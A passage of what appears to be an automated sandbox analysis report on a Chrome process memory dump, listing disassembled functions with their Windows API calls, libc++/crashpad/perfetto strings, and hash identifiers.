                                                    • GetFileInformationByHandleEx.KERNEL32(?,00000002,00000000,00000210), ref: 00D48975
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000188,00000000,\\.\pipe,00000008,00000004,00000000), ref: 00D489FF
                                                      • Part of subcall function 00D77C00: CloseHandle.KERNEL32(00D483A6), ref: 00D77C1A
                                                      • Part of subcall function 00D748E0: RegisterWaitForSingleObject.KERNEL32(00000000,?,00E894F0,00000000,000000FF,00000000), ref: 00D74990
                                                      • Part of subcall function 00D748E0: RegisterWaitForSingleObject.KERNEL32(00000000,?,?,00000000,000000FF,00000000), ref: 00D749B6
                                                      • Part of subcall function 00D748E0: RegisterWaitForSingleObject.KERNEL32(?,?,00000008,00000000,000000FF,00000008), ref: 00D749D8
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D48B36
                                                    Strings
                                                    • \\.\pipe, xrefs: 00D489A5
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D48B97
                                                    • GetFileInformationByHandleEx, xrefs: 00D48BE5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ObjectRegisterSingleWait$ExclusiveHandleLock$AcquireCloseFileInformationRelease
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$GetFileInformationByHandleEx$\\.\pipe
                                                    • API String ID: 1841929329-4152786217
                                                    • Opcode ID: 66db34c8c07ecdb15160a999ba6e9c79bc3891045d0af1ef0a1de104fc2d7fac
                                                    • Instruction ID: 8eb4e3d43dc6f608d43de0042152e8cb78412dfa039bb8b682507e5053c5617b
                                                    • Opcode Fuzzy Hash: 66db34c8c07ecdb15160a999ba6e9c79bc3891045d0af1ef0a1de104fc2d7fac
                                                    • Instruction Fuzzy Hash: A89171B4A003158FDB14DF28D881A59B7F5FF08340F1886AAE849A7352DB30ED85CFA1
                                                    APIs
                                                    Strings
                                                    • pc:%p, xrefs: 00D8450C
                                                    • ..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00D844A0
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D844A7
                                                    • ..\..\third_party\libc++\src\include\string:2862: assertion __s != nullptr failed: string::append received nullptr, xrefs: 00D844AE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:2862: assertion __s != nullptr failed: string::append received nullptr$..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr$pc:%p
                                                    • API String ID: 4218353326-891714225
                                                    • Opcode ID: 76e008fbcda5dd3b0f31d07430d1b046371b51d1b94e51c142e06b44f070a605
                                                    • Instruction ID: 7278bf3778f1b90948a78855890f4c1dfca0d9a09eecf8a12292a640fafe4cc0
                                                    • Opcode Fuzzy Hash: 76e008fbcda5dd3b0f31d07430d1b046371b51d1b94e51c142e06b44f070a605
                                                    • Instruction Fuzzy Hash: AC6119B1C0071A9FCB01EF64D841BAEB7B5EF96304F19C256F4053B261E7B0A985C7A1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00F03488), ref: 00D34F2A
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D34FBC
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00F0348C), ref: 00D350BD
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D350DB
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\array:239: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>, xrefs: 00D3507E
                                                    • 2, xrefs: 00D35013
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: ..\..\third_party\libc++\src\include\array:239: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>$2
                                                    • API String ID: 17069307-716612548
                                                    • Opcode ID: ce4793401275e9a779d94dcaf759326afef337aaf4915ceb30000ce39025df98
                                                    • Instruction ID: 8077e61d22cb3a57d42f3acefdd210f5c058f16b6f8c9ccf97fa2a121d571233
                                                    • Opcode Fuzzy Hash: ce4793401275e9a779d94dcaf759326afef337aaf4915ceb30000ce39025df98
                                                    • Instruction Fuzzy Hash: DF51C1759012098FDB14CF65D480AEEBBF1FF89304F198259E8456B226C736F986CFA0
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00E0491F
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00E0492B
                                                      • Part of subcall function 00E58950: _strlen.LIBCMT ref: 00E58A26
                                                      • Part of subcall function 00E58950: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E58A84
                                                    Strings
                                                    • ..\..\third_party\perfetto\include\perfetto\tracing\track_event_category_registry.h, xrefs: 00E049D7
                                                    • GetHandleVerifier, xrefs: 00E04925
                                                    • PERFETTO_CHECK(false && "A track event used an unknown category. Please add it to " "PERFETTO_DEFINE_CATEGORIES()."), xrefs: 00E049E6
                                                    • %s (errno: %d, %s), xrefs: 00E049EB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProcUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                    • String ID: %s (errno: %d, %s)$..\..\third_party\perfetto\include\perfetto\tracing\track_event_category_registry.h$GetHandleVerifier$PERFETTO_CHECK(false && "A track event used an unknown category. Please add it to " "PERFETTO_DEFINE_CATEGORIES().")
                                                    • API String ID: 1366465500-389051806
                                                    • Opcode ID: f55c7b020ee8b630351bfa4a31a375f82ef3cf01870f331d1f87e968a7d4689f
                                                    • Instruction ID: 37799fbf8ae7c937e352fba0f6c665a0ca6fffa2fe9296434dd532c5a3e7aea7
                                                    • Opcode Fuzzy Hash: f55c7b020ee8b630351bfa4a31a375f82ef3cf01870f331d1f87e968a7d4689f
                                                    • Instruction Fuzzy Hash: 0A5165F0A00341AFD718AF20ED45A6677A1EBC5304F145969F645BB3E2EB30AD89C762
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: has duplicate key $ requires KEY=VALUE$, discarding value $..\..\third_party\crashpad\crashpad\handler\handler_main.cc
                                                    • API String ID: 4218353326-3787997346
                                                    • Opcode ID: 551915cc64255ff86f6d0d16a5b55c6186671de7a5419dce33b9d811f1b4b64a
                                                    • Instruction ID: d562c4c20a2fa5100ea2c0d4f1f51f15210d10b6bb4ff7a65090151202255cfe
                                                    • Opcode Fuzzy Hash: 551915cc64255ff86f6d0d16a5b55c6186671de7a5419dce33b9d811f1b4b64a
                                                    • Instruction Fuzzy Hash: 0841D7F1D0432867EB20AB60AC42FEF7778DF51304F0855A5F50937283E6716A898AB2
                                                    APIs
                                                    • SetLastError.KERNEL32(00000057), ref: 00D39EC9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: ..\..\base\files\file_win.cc$DoInitialize$ScopedBlockingCall
                                                    • API String ID: 1452528299-1981113363
                                                    • Opcode ID: 7c4afbc43c0c8d89258885f0f7d4a446e60923d8bd632a939fdd9a7ce9adc330
                                                    • Instruction ID: 03b92aee4081552dd8fe83334b61cc0588db171efc86a38a397bf9c61ccb989a
                                                    • Opcode Fuzzy Hash: 7c4afbc43c0c8d89258885f0f7d4a446e60923d8bd632a939fdd9a7ce9adc330
                                                    • Instruction Fuzzy Hash: D55111B1A053419FE710DF28E89271AB7E1EFC9310F048929F8D6A7291D774D909CBA2
                                                    APIs
                                                    • ReplaceFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E1890C
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E18916
                                                    • MoveFileW.KERNEL32(?,?), ref: 00E18930
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorLastMoveReplace
                                                    • String ID: ..\..\base\files\file_util_win.cc$ReplaceFileW$ScopedBlockingCall
                                                    • API String ID: 3435996589-3571703075
                                                    • Opcode ID: fec08199af964524c444c05d0f0e33f1deebbc81affdda7fe154a2afc6ac50e6
                                                    • Instruction ID: e573d1e04063cf3bbfb1799f587a33e14f3d6ec8839eb124834ea7fe4dda588f
                                                    • Opcode Fuzzy Hash: fec08199af964524c444c05d0f0e33f1deebbc81affdda7fe154a2afc6ac50e6
                                                    • Instruction Fuzzy Hash: EC514CB0A003509FD724AF24D8817BA77A4EF95314F44652DF9C9BB242EB70A9C48393
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string:990: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr, xrefs: 00D5FC16
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D5FC1D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:990: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr
                                                    • API String ID: 1452528299-3564941561
                                                    • Opcode ID: 75f392e3b41f8b509f91b872709d4525606cbc5b2957238bf3334fc56f7ead19
                                                    • Instruction ID: d2dfcd2076507b5e19ee2b7cdc34c86077ed2d88489132fe0466b33ecf7071de
                                                    • Opcode Fuzzy Hash: 75f392e3b41f8b509f91b872709d4525606cbc5b2957238bf3334fc56f7ead19
                                                    • Instruction Fuzzy Hash: 614137712003099FCB10AFA5D8C457E77E9EF84326B28453EFC966B381DA31AC498771
                                                    APIs
                                                    • ReleaseSRWLockExclusive.KERNEL32 ref: 00D33FC9
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D33FE3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D34021
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CounterExclusiveLockPerformanceQueryReleaseUnothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: @KL
                                                    • API String ID: 1367642695-3812413351
                                                    • Opcode ID: 94c82c57b8c96d1f13037afea1ad19a0b54d1cfe8380d2a04304dc199ff3eb5d
                                                    • Instruction ID: cebaaccbc48b671826cc4a47cb01cd533896aad015766a5a0e53bebe19c15600
                                                    • Opcode Fuzzy Hash: 94c82c57b8c96d1f13037afea1ad19a0b54d1cfe8380d2a04304dc199ff3eb5d
                                                    • Instruction Fuzzy Hash: 65514771A043419FC718CF29D955A2BBBF6FF88300F14892EF595976A1D734E844CB92
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00E7E7C4), ref: 00E7C8CE
                                                    • IsWow64Process.KERNEL32(00000000,?), ref: 00E7C8D6
                                                      • Part of subcall function 00E24D10: VirtualFree.KERNEL32(?,00D9B1C1,00004000,?,65449514,?,00E7E7C4), ref: 00E24DD5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentFreeVirtualWow64
                                                    • String ID: $ize$mit$size
                                                    • API String ID: 1078977170-2684755539
                                                    • Opcode ID: 84de9ece455c983eba231f0c7bd3adb1772e25241db7ce5ac41cd46f940f921c
                                                    • Instruction ID: dc0cfcfab1090650e29e2e4f8406ac44e60a377c96a1aac13bdc34ded79b3109
                                                    • Opcode Fuzzy Hash: 84de9ece455c983eba231f0c7bd3adb1772e25241db7ce5ac41cd46f940f921c
                                                    • Instruction Fuzzy Hash: AB41B2B05013009FD7149F25D488A96BBE8EF89318F29C47EE44D9B312E776D905CBA2
                                                    APIs
                                                    • CreateDirectoryW.KERNEL32(00000004,00000000), ref: 00D6E245
                                                    • GetLastError.KERNEL32 ref: 00D6E24F
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D6E354
                                                    • ..\..\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 00D6E2B5
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D6E34D
                                                    • CreateDirectory , xrefs: 00D6E2C7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast
                                                    • String ID: ..\..\third_party\crashpad\crashpad\client\crash_report_database_win.cc$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CreateDirectory
                                                    • API String ID: 1375471231-3193998906
                                                    • Opcode ID: 5fa172912ec0b6d15081dfb85e720cde9aee424251246859b8f57161b780e8e1
                                                    • Instruction ID: e4d9e8b9196d7ef336d28bf4d00be9d8a8cbac37784955b1163d02cc04244eae
                                                    • Opcode Fuzzy Hash: 5fa172912ec0b6d15081dfb85e720cde9aee424251246859b8f57161b780e8e1
                                                    • Instruction Fuzzy Hash: 8A313175B003245FDB10AA64EC86F7F77A99F05705F081479F909FB382E761AD488762
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(bcryptprimitives.dll), ref: 00D4432B
                                                    • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D4433B
                                                      • Part of subcall function 00E282C8: AcquireSRWLockExclusive.KERNEL32(00EF2800,000000C0,?,?,00DBFE69,00F02A10), ref: 00E282D3
                                                      • Part of subcall function 00E282C8: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00DBFE69,00F02A10), ref: 00E2830D
                                                    • LoadLibraryW.KERNEL32(bcryptprimitives.dll), ref: 00D4437B
                                                    • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D4438B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressExclusiveLibraryLoadLockProc$AcquireRelease
                                                    • String ID: ProcessPrng$bcryptprimitives.dll
                                                    • API String ID: 4021025505-2667675608
                                                    • Opcode ID: 9c45af4afb6ee8d2e096075cb6e06953c3e7a05568f7ebb8db19a66f07019f40
                                                    • Instruction ID: bfaa665077cded2ae579cbaabfaedc3e1372fa733b36a571d4e785370a2c202a
                                                    • Opcode Fuzzy Hash: 9c45af4afb6ee8d2e096075cb6e06953c3e7a05568f7ebb8db19a66f07019f40
                                                    • Instruction Fuzzy Hash: 713129B16807099FC3149F25EC8572673A5EBC4B10F09462DF915BB2A0EB30A885C622
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,00000000), ref: 00DF0DEE
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00DF0DFA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
